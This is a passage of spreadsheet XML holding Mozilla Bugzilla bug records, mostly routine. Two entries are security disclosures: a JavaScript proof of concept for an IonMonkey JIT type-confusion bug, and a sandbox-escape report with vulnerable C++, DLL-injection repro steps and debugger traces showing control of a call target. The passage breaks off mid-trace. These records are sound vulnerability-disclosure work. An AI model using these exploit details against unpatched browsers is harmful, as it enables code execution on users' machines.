        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2982" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2982" t="inlineStr">
        <is>
          <t>u=contributor c=questions p=1 s=2013.9</t>
        </is>
      </c>
      <c r="Q2982" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2982" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2982" t="inlineStr">
        <is>
          <t>2013Q2</t>
        </is>
      </c>
      <c r="T2982" t="n">
        <v>1</v>
      </c>
      <c r="U2982" t="n">
        <v>0</v>
      </c>
      <c r="V2982" t="n">
        <v>5</v>
      </c>
      <c r="W2982" t="inlineStr">
        <is>
          <t>I just realized that if you go edit an existing question and you have the troubleshooting addon installed, it will update the troubleshooting info with your own. So if a moderator goes in to edit, the moderators browser info will overwrite the original info.
This probably isn't good.
Probably an easy fix =&gt; 1pt</t>
        </is>
      </c>
      <c r="X2982" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2983">
      <c r="A2983" t="n">
        <v>1536768</v>
      </c>
      <c r="B2983" t="inlineStr">
        <is>
          <t>2019-03-20 04:27:52 -0700</t>
        </is>
      </c>
      <c r="C2983" t="inlineStr">
        <is>
          <t>IonMonkey: unexpected ObjectGroup in ObjectGroupDispatch operation might lead to potentially unsafe code being executed</t>
        </is>
      </c>
      <c r="D2983" t="inlineStr">
        <is>
          <t>2020-11-03 01:59:55 -0800</t>
        </is>
      </c>
      <c r="E2983" t="n">
        <v>1</v>
      </c>
      <c r="F2983" t="n">
        <v>1</v>
      </c>
      <c r="G2983" t="n">
        <v>3</v>
      </c>
      <c r="H2983" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2983" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2983" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K2983" t="inlineStr">
        <is>
          <t>66 Branch</t>
        </is>
      </c>
      <c r="L2983" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2983" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2983" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2983" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2983" t="inlineStr">
        <is>
          <t>[adv-main67+][adv-esr60.7+]</t>
        </is>
      </c>
      <c r="Q2983" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2983" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2983" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T2983" t="n">
        <v>1</v>
      </c>
      <c r="U2983" t="n">
        <v>0</v>
      </c>
      <c r="V2983" t="n">
        <v>18</v>
      </c>
      <c r="W2983" t="inlineStr">
        <is>
          <t>While fuzzing Spidermonkey, I encountered the following (commented and modified) JavaScript program which crashes debug builds of the latest release version of Spidermonkey (from commit [3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c](https://github.com/mozilla/gecko-dev/commit/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c)):
    function O1() {
        this.s = 'foobar';
        this.a = 42;
        // Avoid unboxed layout for O1 instances as this will cause the JIT
        // compiler to behave differently and not emit the ObjectGroupDispatch
        // operation (see below).
        delete this.a;
    }
    // This function will be inlined below in v4, together with the default
    // Object.prototype.toString implementation.
    // This just demonstrates that a custom function can be inlined which
    // will make assumptions about the input ObjectGroup.
    O1.prototype.toString = function() {
        return this.s;
    };
    function v4(v5) {
        // Once v22 is allocated as unboxed object, this will convert it to a
        // native object, which will cause its ObjectGroup to change.
        delete v5.nonExistent;
        // The call to .toString here will be implemented as a switch
        // (ObjectGroupDispatch operation) on the ObjectGroup with two cases
        // (ObjectGroup of v22 and v17). Depending on the input, the dispatch will
        // jump to one of the two inlined implementations of toString. However,
        // after v22 is allocated as UnboxedObject (still with the same
        // ObjectGroup as before), the delete operation above will convert it back
        // to a NativeObject, now changing the ObjectGroup. Afterwards, this
        // ObjectGroupDispatch operation will see an unexpected ObjectGroup and,
        // in debug builds, crash with an assertion failure. In release builds
        // it will just fallthrough to whichever branch was emitted right after
        // the dispatch operation.
        return v5.toString();
    }
    function v11() {
        const v22 = {p: 1337};
        v4(v22);
        let v26 = 0;
        do {
            const v17 = new O1;
            v4(v17);
            v26++;
        } while (v26 &lt; 100);
    }
    for (let v33 = 0; v33 &lt; 100; v33++) {
        const v37 = v11();
    }
The program will crash with an assertion similar to:
    &gt; ../build_DBG.OBJ/dist/bin/js crash.js
    Assertion failure: Unexpected ObjectGroup, at js/src/jit/MacroAssembler.cpp:2014
    [1]    54116 trace trap  ../build_DBG.OBJ/dist/bin/js crash.js
It appears that roughly the following is happening here:
* Initially, the objects v22 and v17 will be allocated as native objects with two different ObjectGroups (an ObjectGroup [1] stores type information such as the prototype object and property/method types for an object): OG1 and OG2.
* Function v4 will be called repeatedly with objects of both ObjectGroups and will eventually be JIT compiled by IonMonkey. At that point, it will be compiled to expect an object with ObjectGroup OG1 or OG2 based on type feedback from the interpreter/baseline JIT and will be deoptimized if it is ever called with an object of a different group.
* The call to .toString in v4 will be optimized by inlining [2] the two possible implementations (O1.prototype.toString and Object.prototype.toString) and then performing a switch on the ObjectGroup of the input to determine which implementation to jump to. The switch is implemented by the ObjectGroupDispatch operation. Since both input ObjectGroups are covered, the instruction does not have a default (fallback) path [3].
* At a later point, the allocation site of v22 is modified to create an object with unboxed layout [4] which will store its properties inline in an unboxed form but still use ObjectGroup OG1.
* Afterwards, in the JIT code for v4, the delete operation converts the UnboxedObject back to a NativeObject [5], this time changing the ObjectGroup to a new group OG3 [6].
* Finally, when executing the machine code for the ObjectGroupDispatch operation, the new ObjectGroup matches none of the expected ones. At this point the program will crash with an assertion in debug builds. In release builds, it would now simply fall through to whichever one of the inlined implementations was directly following the ObjectGroupDispatch operation.
At least this way of triggering the bug is related to UnboxedObjects, which [have recently been disabled by default](https://github.com/mozilla/gecko-dev/commit/26965039e60a00b3600ce2e6a559106e4a3a30ca). However, I am not sure if the conversion from unboxed to native objects due to the property deletion is the only reason that an object's ObjectGroup can change unexpectedly (in this situation).
As for exploitation, it might be possible to cause a type confusion by causing a fallthrough to the inlined code for the other ObjectGroup. In that case, the inlined code would expect to receive an object of a specific ObjectGroup and might omit further security checks based on that. For this specific sample it seems that the fallthrough path always happens to be the correct one (i.e. the one for Object.prototype.toString), but I assume it could also be the other way around in a different context. Furthermore, it might be possible to cause other code constructs (apart form the ObjectGroupDispatch) that rely on ObjectGroup information to misbehave in this situation. 
Please note: this bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.
With any fix, please give credit for identifying the vulnerability to Samuel Groß of Google Project Zero.
[1] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/ObjectGroup.h#L87
[2] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/IonBuilder.cpp#L4517
[3] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/IonBuilder.cpp#L4923
[4] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/UnboxedObject.cpp#L1416
[5] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/UnboxedObject.cpp#L1150
[6] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/UnboxedObject.cpp#L756</t>
        </is>
      </c>
      <c r="X2983" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2984">
      <c r="A2984" t="n">
        <v>1286214</v>
      </c>
      <c r="B2984" t="inlineStr">
        <is>
          <t>2016-07-12 05:39:40 -0700</t>
        </is>
      </c>
      <c r="C2984" t="inlineStr">
        <is>
          <t>Backfill: Identify outage period</t>
        </is>
      </c>
      <c r="D2984" t="inlineStr">
        <is>
          <t>2018-10-15 11:08:31 -0700</t>
        </is>
      </c>
      <c r="E2984" t="n">
        <v>1</v>
      </c>
      <c r="F2984" t="n">
        <v>1</v>
      </c>
      <c r="G2984" t="n">
        <v>6</v>
      </c>
      <c r="H2984" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2984" t="inlineStr">
        <is>
          <t>Cloud Services Graveyard</t>
        </is>
      </c>
      <c r="J2984" t="inlineStr">
        <is>
          <t>Metrics: Pipeline</t>
        </is>
      </c>
      <c r="K2984" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2984" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2984" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2984" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2984" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2984" t="inlineStr"/>
      <c r="Q2984" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2984" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2984" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2984" t="n">
        <v>1</v>
      </c>
      <c r="U2984" t="n">
        <v>0</v>
      </c>
      <c r="V2984" t="n">
        <v>2</v>
      </c>
      <c r="W2984" t="inlineStr">
        <is>
          <t>Identify the period during which submissions were being dropped. Be pessimistic - if a day was partially affected, we should backfill the entire day.</t>
        </is>
      </c>
      <c r="X2984" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2985">
      <c r="A2985" t="n">
        <v>206037</v>
      </c>
      <c r="B2985" t="inlineStr">
        <is>
          <t>2003-05-17 03:25:30 -0700</t>
        </is>
      </c>
      <c r="C2985" t="inlineStr">
        <is>
          <t>[SECURITY] Fix escaping/quoting in editXXX.cgi scripts</t>
        </is>
      </c>
      <c r="D2985" t="inlineStr">
        <is>
          <t>2006-10-18 18:58:02 -0700</t>
        </is>
      </c>
      <c r="E2985" t="n">
        <v>1</v>
      </c>
      <c r="F2985" t="n">
        <v>1</v>
      </c>
      <c r="G2985" t="n">
        <v>4</v>
      </c>
      <c r="H2985" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2985" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2985" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K2985" t="inlineStr">
        <is>
          <t>2.10</t>
        </is>
      </c>
      <c r="L2985" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2985" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2985" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2985" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2985" t="inlineStr">
        <is>
          <t>ready for 2.18.6] [ready for 2.20.3][ready for 2.22.1][ready for 2.23.3]</t>
        </is>
      </c>
      <c r="Q2985" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2985" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S2985" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T2985" t="n">
        <v>1</v>
      </c>
      <c r="U2985" t="n">
        <v>0</v>
      </c>
      <c r="V2985" t="n">
        <v>101</v>
      </c>
      <c r="W2985" t="inlineStr">
        <is>
          <t>If you add a component, the name isn't escaped properly, or is over-escaped, or
something.
[This bug report is a transcription of a scrap of paper. I assume that if
someone tests Add Component a little bit (with &amp;amp; and &amp; signs etc.) they'll
figure out what the problem was that I saw.]
Gerv</t>
        </is>
      </c>
      <c r="X2985" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2986">
      <c r="A2986" t="n">
        <v>101666</v>
      </c>
      <c r="B2986" t="inlineStr">
        <is>
          <t>2001-09-25 19:15:55 -0700</t>
        </is>
      </c>
      <c r="C2986" t="inlineStr">
        <is>
          <t>Mozilla receives different page after submiting this form. (HTTPS).</t>
        </is>
      </c>
      <c r="D2986" t="inlineStr">
        <is>
          <t>2002-04-25 19:43:06 -0700</t>
        </is>
      </c>
      <c r="E2986" t="n">
        <v>1</v>
      </c>
      <c r="F2986" t="n">
        <v>1</v>
      </c>
      <c r="G2986" t="n">
        <v>3</v>
      </c>
      <c r="H2986" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2986" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2986" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K2986" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2986" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2986" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2986" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2986" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2986" t="inlineStr">
        <is>
          <t>topsite, partner, [adt2]</t>
        </is>
      </c>
      <c r="Q2986" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2986" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2986" t="inlineStr">
        <is>
          <t>mozilla1.0</t>
        </is>
      </c>
      <c r="T2986" t="n">
        <v>1</v>
      </c>
      <c r="U2986" t="n">
        <v>0</v>
      </c>
      <c r="V2986" t="n">
        <v>43</v>
      </c>
      <c r="W2986" t="inlineStr">
        <is>
          <t>Tested with Mozilla/5.0 (Windows; U; Win98; en-US; rv:0.9.4+) Gecko/20010925
----------
Please go to the above URL and try to checkout. 
with Mozilla, you will have a different URL after you submit the form data. It
says: Object Moved. If you use IE you will have the proper web page. Dave used a
proxy and realized that with Mozilla there is one HTTP 100 code returned after
the form posting. 
Please help us find out if this is something in the client or something that we
can talk with their webmaster/engineeers to have this fixed in the web site.</t>
        </is>
      </c>
      <c r="X2986" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2987">
      <c r="A2987" t="n">
        <v>434008</v>
      </c>
      <c r="B2987" t="inlineStr">
        <is>
          <t>2008-05-15 22:53:17 -0700</t>
        </is>
      </c>
      <c r="C2987" t="inlineStr">
        <is>
          <t>Readonly custom field texts appear too small</t>
        </is>
      </c>
      <c r="D2987" t="inlineStr">
        <is>
          <t>2008-10-07 11:42:20 -0700</t>
        </is>
      </c>
      <c r="E2987" t="n">
        <v>1</v>
      </c>
      <c r="F2987" t="n">
        <v>1</v>
      </c>
      <c r="G2987" t="n">
        <v>4</v>
      </c>
      <c r="H2987" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2987" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2987" t="inlineStr">
        <is>
          <t>User Interface</t>
        </is>
      </c>
      <c r="K2987" t="inlineStr">
        <is>
          <t>3.1.4</t>
        </is>
      </c>
      <c r="L2987" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2987" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2987" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2987" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2987" t="inlineStr"/>
      <c r="Q2987" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2987" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S2987" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T2987" t="n">
        <v>1</v>
      </c>
      <c r="U2987" t="n">
        <v>0</v>
      </c>
      <c r="V2987" t="n">
        <v>17</v>
      </c>
      <c r="W2987" t="inlineStr">
        <is>
          <t>On edit bug custom fields appear with font-size:small, this makes the text hard to see.</t>
        </is>
      </c>
      <c r="X2987" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2988">
      <c r="A2988" t="n">
        <v>1422836</v>
      </c>
      <c r="B2988" t="inlineStr">
        <is>
          <t>2017-12-04 06:52:13 -0800</t>
        </is>
      </c>
      <c r="C2988" t="inlineStr">
        <is>
          <t>Reset default assignee and QA contact for several Mozilla Localization components</t>
        </is>
      </c>
      <c r="D2988" t="inlineStr">
        <is>
          <t>2018-01-17 16:57:11 -0800</t>
        </is>
      </c>
      <c r="E2988" t="n">
        <v>1</v>
      </c>
      <c r="F2988" t="n">
        <v>1</v>
      </c>
      <c r="G2988" t="n">
        <v>7</v>
      </c>
      <c r="H2988" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2988" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J2988" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K2988" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L2988" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2988" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2988" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2988" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2988" t="inlineStr"/>
      <c r="Q2988" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2988" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2988" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2988" t="n">
        <v>1</v>
      </c>
      <c r="U2988" t="n">
        <v>0</v>
      </c>
      <c r="V2988" t="n">
        <v>3</v>
      </c>
      <c r="W2988" t="inlineStr">
        <is>
          <t>Please update the following components
Mozilla Localizations :: af / Afrikaans
Mozilla Localizations :: ca / Catalan
Mozilla Localizations :: gu-IN / Gujarati
Mozilla Localizations :: ka / Georgian
Mozilla Localizations :: xh / Xhosa
With defaults:
Assignee: nobody
QA Contact: empty
Current assignees are not active anymore in localizations.</t>
        </is>
      </c>
      <c r="X2988" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2989">
      <c r="A2989" t="n">
        <v>57371</v>
      </c>
      <c r="B2989" t="inlineStr">
        <is>
          <t>2000-10-19 20:43:01 -0700</t>
        </is>
      </c>
      <c r="C2989" t="inlineStr">
        <is>
          <t>Inform Apple about quirks/standard layout modes</t>
        </is>
      </c>
      <c r="D2989" t="inlineStr">
        <is>
          <t>2015-04-19 23:39:42 -0700</t>
        </is>
      </c>
      <c r="E2989" t="n">
        <v>1</v>
      </c>
      <c r="F2989" t="n">
        <v>1</v>
      </c>
      <c r="G2989" t="n">
        <v>6</v>
      </c>
      <c r="H2989" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2989" t="inlineStr">
        <is>
          <t>Tech Evangelism Graveyard</t>
        </is>
      </c>
      <c r="J2989" t="inlineStr">
        <is>
          <t>English US</t>
        </is>
      </c>
      <c r="K2989" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2989" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2989" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2989" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2989" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2989" t="inlineStr"/>
      <c r="Q2989" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2989" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2989" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2989" t="n">
        <v>1</v>
      </c>
      <c r="U2989" t="n">
        <v>0</v>
      </c>
      <c r="V2989" t="n">
        <v>25</v>
      </c>
      <c r="W2989" t="inlineStr">
        <is>
          <t>Need to inform Apple about quirks/standard layout modes and the effect on their 
navigation bar.</t>
        </is>
      </c>
      <c r="X2989" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2990">
      <c r="A2990" t="n">
        <v>466291</v>
      </c>
      <c r="B2990" t="inlineStr">
        <is>
          <t>2008-11-22 06:07:59 -0800</t>
        </is>
      </c>
      <c r="C2990" t="inlineStr">
        <is>
          <t>Revise the What's New redirect</t>
        </is>
      </c>
      <c r="D2990" t="inlineStr">
        <is>
          <t>2008-11-23 20:24:42 -0800</t>
        </is>
      </c>
      <c r="E2990" t="n">
        <v>1</v>
      </c>
      <c r="F2990" t="n">
        <v>1</v>
      </c>
      <c r="G2990" t="n">
        <v>6</v>
      </c>
      <c r="H2990" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2990" t="inlineStr">
        <is>
          <t>Mozilla Messaging Graveyard</t>
        </is>
      </c>
      <c r="J2990" t="inlineStr">
        <is>
          <t>Server Operations</t>
        </is>
      </c>
      <c r="K2990" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2990" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2990" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2990" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2990" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2990" t="inlineStr"/>
      <c r="Q2990" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2990" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2990" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2990" t="n">
        <v>1</v>
      </c>
      <c r="U2990" t="n">
        <v>0</v>
      </c>
      <c r="V2990" t="n">
        <v>3</v>
      </c>
      <c r="W2990" t="inlineStr">
        <is>
          <t>I've just pushed a nightly what's new page to the production server for bug 464784. We now need to re-adjust the redirects for the website to compensate before we check in the rest of that bug.
The current redirect is from:
http://live.mozillamessaging.com/%APP%/whatsnew?locale=%LOCALE%&amp;version=%VERSION%&amp;os=%OS%&amp;buildid=%APPBUILDID%
to:
http://www.mozillamessaging.com/en-US/thunderbird/nightly/start/
This now needs to redirect to:
http://www.mozillamessaging.com/en-US/thunderbird/nightly/whatsnew/
Simple change, but consider this a TB 3b1 blocker.</t>
        </is>
      </c>
      <c r="X2990" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2991">
      <c r="A2991" t="n">
        <v>1610426</v>
      </c>
      <c r="B2991" t="inlineStr">
        <is>
          <t>2020-01-20 22:05:50 -0800</t>
        </is>
      </c>
      <c r="C2991" t="inlineStr">
        <is>
          <t>No validation of array index (key) in xul!mozilla::ipc::CrashReporterMetadataShmem::ReadAppNotes leads to Stack Out-Of-Bounds write in the broker process (Sandbox Escape / LPE)</t>
        </is>
      </c>
      <c r="D2991" t="inlineStr">
        <is>
          <t>2024-05-30 10:11:08 -0700</t>
        </is>
      </c>
      <c r="E2991" t="n">
        <v>1</v>
      </c>
      <c r="F2991" t="n">
        <v>1</v>
      </c>
      <c r="G2991" t="n">
        <v>3</v>
      </c>
      <c r="H2991" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2991" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J2991" t="inlineStr">
        <is>
          <t>Crash Reporting</t>
        </is>
      </c>
      <c r="K2991" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2991" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2991" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2991" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2991" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2991" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main73+] [adv-esr68.5+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2991" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2991" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2991" t="inlineStr">
        <is>
          <t>mozilla74</t>
        </is>
      </c>
      <c r="T2991" t="n">
        <v>1</v>
      </c>
      <c r="U2991" t="n">
        <v>0</v>
      </c>
      <c r="V2991" t="n">
        <v>30</v>
      </c>
      <c r="W2991" t="inlineStr">
        <is>
          <t>Created attachment 9121969
stackoobw.zip
Hi,
# Vulnerability
Memory corruption (Sandbox escape) in mozilla::ipc::CrashReporterMetadataShmem::ReadAppNotes tested on Firefox 72.0.2.7321
The vulnerability is in the following function:
```cpp
// https://github.com/mozilla/gecko-dev/blob/master/ipc/glue/CrashReporterMetadataShmem.cpp#L210
typedef mozilla::EnumeratedArray&lt;Annotation, Annotation::Count, nsCString&gt; AnnotationTable;
void CrashReporterMetadataShmem::ReadAppNotes(const Shmem&amp; aShmem,
                                              AnnotationTable&amp; aNotes) {
  for (MetadataShmemReader reader(aShmem); !reader.Done(); reader.Next()) {
    switch (reader.Type()) {
      case EntryType::Annotation: {
        Annotation key; // no sanitization of key (uint32_t)
        nsCString value;
        if (!reader.Read(&amp;key) || !reader.Read(value)) {
          return;
        }
        // Stack OOB write due to key (neither EnumeratedArray[] or Array[] have bounds check in release build)
        aNotes[key] = value; // EnumeratedArray (fixed length) stored in stack of mozilla::ipc::CrashReporterHost::FinalizeCrashReport
        break;
      }
      default:
        NS_ASSERTION(false, "Unknown metadata entry type");
        break;
    }
  }
}
```
The _key_ variable comes from the shared memory (ShMem) without any validation and it is used as array index for storing the value string. A malicious content process (sandboxed) can modify its _CrashReporterClient_ shared memory, crash itself to trigger the vulnerable code path in the broker process (not sandboxed) and achieve code execution outside the sandbox.
# Repro and Crash
To reproduce, install Python 2.7 64 bits and PythonForWindows (https://github.com/hakril/PythonForWindows), compile **payload_corrupt.cc** (change offset in _GetShMem_ if running different version then nmake) then run inject.py with the payload_corrupt.dll path.
The POC (provided - see attached files) sets the _key_ to 0xfffffff of the first annotation and crash the content process (NULL deref).
The broker process will crash when trying to read the annotation of the crashed child:
```
xul!nsTSubstring&lt;char&gt;::Assign+0x41:
00007ff9`c3bb1041 0fb7460c        movzx   eax,word ptr [rsi+0Ch] ds:00000085`32ffe164=????
this = 0x00000085`32ffe158 (nsTSubstring&lt;char&gt;::Assign)
00000084`32ffe168 class mozilla::EnumeratedArray&lt;CrashReporter::Annotation,CrashReporter::Annotation::Count,nsTString&lt;char&gt; &gt; annotations (CrashReporterHost::FinalizeCrashReport)
? 0xfffffff * 0x10 + 0x8432ffe168 + c
Evaluate expression: 572086280548 = 00000085`32ffe164
0:000&gt; kc
 # Call Site
00 xul!nsTSubstring&lt;char&gt;::Assign
01 xul!nsTSubstring&lt;char&gt;::Assign
02 xul!nsTString&lt;char&gt;::operator=
03 xul!mozilla::ipc::CrashReporterMetadataShmem::ReadAppNotes
04 xul!mozilla::ipc::CrashReporterHost::FinalizeCrashReport
05 xul!mozilla::ipc::CrashReporterHost::GenerateCrashReport
06 xul!mozilla::dom::ContentParent::ActorDestroy
07 xul!mozilla::ipc::IProtocol::DestroySubtree
08 xul!mozilla::dom::PContentParent::OnChannelError
09 xul!mozilla::dom::ContentParent::OnChannelError
0a xul!mozilla::detail::RunnableMethodArguments&lt;&gt;::applyImpl
0b xul!mozilla::detail::RunnableMethodArguments&lt;&gt;::apply
0c xul!mozilla::detail::RunnableMethodImpl&lt;mozilla::ipc::MessageChannel *,void (mozilla::ipc::MessageChannel::*)(),0,mozilla::RunnableKind::Cancelable&gt;::Run
0d xul!nsThread::ProcessNextEvent
0e xul!NS_ProcessNextEvent
0f xul!mozilla::ipc::MessagePump::Run
10 xul!MessageLoop::RunInternal
11 xul!MessageLoop::RunHandler
12 xul!MessageLoop::Run
13 xul!nsBaseAppShell::Run
14 xul!nsAppShell::Run
15 xul!nsAppStartup::Run
16 xul!XREMain::XRE_mainRun
17 xul!XREMain::XRE_main
18 xul!XRE_main
```
# Exploitation
The exploitation assumes having code execution in sandboxed renderers processes (RCE -&gt; LPE step targeted).
By modifying the _key_ (array index), we can replace objects stored in the stack frame of caller functions. 
On Firefox version 72.0.2.7321 on Windows 10 x86-64, some offsets are very interesting for exploitation:
```
xul!nsCOMPtr_base::~nsCOMPtr_base+0xb5d [inlined in xul!nsThread::ProcessNextEvent+0x14d8]:
00007ff9`c3beab08 ff5010          call    qword ptr [rax+10h] ds:41414141`41414151=???????????????? // rax controlled via the string value
0:000&gt; kc
 # Call Site
00 xul!nsCOMPtr_base::~nsCOMPtr_base
01 xul!mozilla::dom::ScriptSettingsStackEntry::~ScriptSettingsStackEntry
02 xul!mozilla::dom::AutoNoJSAPI::~AutoNoJSAPI
03 xul!mozilla::Maybe&lt;mozilla::dom::AutoNoJSAPI&gt;::reset
